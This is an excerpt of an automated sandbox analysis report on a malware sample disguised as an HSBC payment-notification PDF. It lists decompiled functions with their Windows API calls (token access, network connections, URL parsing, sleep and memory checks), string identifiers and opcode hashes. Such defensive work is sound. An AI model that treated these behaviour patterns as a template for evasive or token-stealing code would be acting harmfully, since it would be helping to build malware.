                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1946975507-0
                                                                                                                                                    • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                    • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                                                                                    • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                    • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                                                                                    Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                    • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                    • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                                                                                    • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                    • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                                                                                    Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: %I
                                                                                                                                                    • API String ID: 0-63094095
                                                                                                                                                    • Opcode ID: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                                                                                                                    • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                                                                                    • Opcode Fuzzy Hash: 942e1b8f80069f074c1b2c40e5fc917702e3634c8d599ac88492e2e2913508d1
                                                                                                                                                    • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                                                                                    Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow_s
                                                                                                                                                    • String ID: xbL$xbL
                                                                                                                                                    • API String ID: 3653519197-3351732020
                                                                                                                                                    • Opcode ID: 0203ba2e32099890d9dfc51e96d6d033b93f2ed1b6133ae6911d43c32e14ac44
                                                                                                                                                    • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                                                                                    • Opcode Fuzzy Hash: 0203ba2e32099890d9dfc51e96d6d033b93f2ed1b6133ae6911d43c32e14ac44
                                                                                                                                                    • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                                                                                    Function 0046AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                    • String ID: LPT
                                                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                                                    • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                    • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                                                                                    • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                    • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                                                                                    Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                    • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                    • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                                                                                    • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                    • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                                                                                    Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID: DdL$DdL
                                                                                                                                                    • API String ID: 1473721057-91670653
                                                                                                                                                    • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                    • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                                                                                                    • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                    • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                                                                                    Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0047259E
                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                                    • String ID: |
                                                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                                                    • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                                                                                                                    • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                                                                                    • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                                                                                                                    • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                                                                                    Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                    • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                                                                                    • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                                                                                    • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                                                                                                    • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                                                                                    Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462911
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                                                                                                                                                    • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                                                                                                    • Opcode Fuzzy Hash: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                                                                                                                                                    • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                                                                                    Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Combobox
                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                    • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                    • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                                                                                    • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                    • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                                                                                    Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                    • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                    • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                                                                                    • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                    • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                                                                                    Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                    • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                    • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                                                                                                    • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                    • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                                                                                    Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                    Download Yara Rule
